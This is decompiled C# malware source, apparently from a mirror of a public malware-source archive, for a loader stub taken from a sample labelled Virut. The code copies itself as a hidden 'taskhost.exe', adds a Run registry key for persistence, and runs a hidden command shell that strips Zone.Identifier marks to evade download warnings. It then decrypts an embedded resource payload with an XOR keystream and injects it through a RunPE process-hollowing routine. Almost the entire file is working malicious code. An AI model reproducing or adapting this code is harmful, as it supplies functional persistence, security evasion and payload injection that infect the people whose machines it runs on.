mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
120 lines
5.1 KiB
C#
120 lines
5.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: smss.ReadResource
|
|||
|
|
// Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic;
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using Microsoft.Win32;
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Runtime.CompilerServices;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
|
|||
|
|
namespace smss
|
|||
|
|
{
|
|||
|
|
[StandardModule]
|
|||
|
|
internal sealed class ReadResource
|
|||
|
|
{
|
|||
|
|
private static object _tPath = (object) (Environment.GetEnvironmentVariable("windir") + "\\temp\\taskhost.exe");
|
|||
|
|
private static object _proc = (object) Process.GetCurrentProcess().MainModule.ModuleName;
|
|||
|
|
|
|||
|
|
public static void Startup()
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
if (!File.Exists(Conversions.ToString(ReadResource._tPath)))
|
|||
|
|
File.Copy(Conversions.ToString(ReadResource._proc), Conversions.ToString(ReadResource._tPath), true);
|
|||
|
|
File.SetAttributes(Conversions.ToString(ReadResource._tPath), File.GetAttributes(Conversions.ToString(ReadResource._tPath)) | FileAttributes.Hidden);
|
|||
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
|
|||
|
|
if (registryKey == null || registryKey.GetValue(Conversions.ToString(ReadResource._tPath)) != null)
|
|||
|
|
return;
|
|||
|
|
registryKey.SetValue(Conversions.ToString(ReadResource._tPath), RuntimeHelpers.GetObjectValue(ReadResource._tPath));
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static void DisableSecurity()
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
Process process = new Process();
|
|||
|
|
ProcessStartInfo processStartInfo1 = new ProcessStartInfo();
|
|||
|
|
ProcessStartInfo processStartInfo2 = processStartInfo1;
|
|||
|
|
processStartInfo2.FileName = "cmd";
|
|||
|
|
processStartInfo2.RedirectStandardInput = true;
|
|||
|
|
processStartInfo2.RedirectStandardOutput = true;
|
|||
|
|
processStartInfo2.UseShellExecute = false;
|
|||
|
|
processStartInfo2.CreateNoWindow = true;
|
|||
|
|
process.StartInfo = processStartInfo1;
|
|||
|
|
process.Start();
|
|||
|
|
using (StreamReader standardOutput = process.StandardOutput)
|
|||
|
|
{
|
|||
|
|
using (StreamWriter standardInput = process.StandardInput)
|
|||
|
|
{
|
|||
|
|
standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject((object) "cd ", ReadResource._tPath)), (object) AppWinStyle.Hide);
|
|||
|
|
standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object) "FOR /R %I IN (*", ReadResource._proc), (object) "*) DO > %I:Zone.Identifier ECHO.")), (object) AppWinStyle.Hide);
|
|||
|
|
standardInput.WriteLine("exit");
|
|||
|
|
standardInput.Close();
|
|||
|
|
}
|
|||
|
|
standardOutput.Close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|||
|
|
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr fr);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern int SizeofResource(IntPtr hModule, IntPtr fr);
|
|||
|
|
|
|||
|
|
[STAThread]
|
|||
|
|
public static void Main()
|
|||
|
|
{
|
|||
|
|
ReadResource.DisableSecurity();
|
|||
|
|
ReadResource.Startup();
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
|
|||
|
|
IntPtr moduleHandle = ReadResource.GetModuleHandle(ref moduleName);
|
|||
|
|
IntPtr resource = ReadResource.FindResource(moduleHandle, "0", "RT_RCDATA");
|
|||
|
|
IntPtr source = ReadResource.LoadResource(moduleHandle, resource);
|
|||
|
|
int length = ReadResource.SizeofResource(moduleHandle, resource);
|
|||
|
|
byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
|
|||
|
|
Marshal.Copy(source, numArray, 0, length);
|
|||
|
|
int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
|
|||
|
|
byte[] data = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
|
|||
|
|
Random random = new Random(int32_1);
|
|||
|
|
byte[] buffer = new byte[data.Length - 1 + 1 - 1 + 1];
|
|||
|
|
random.NextBytes(buffer);
|
|||
|
|
int int32_2 = Convert.ToInt32(data.Length - 1);
|
|||
|
|
for (int index = 0; index <= int32_2; ++index)
|
|||
|
|
data[index] = Convert.ToByte((byte) ((int) data[index] ^ (int) buffer[index]));
|
|||
|
|
RunpeClass.RunpeSub(data, Conversions.ToString(ReadResource._proc));
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|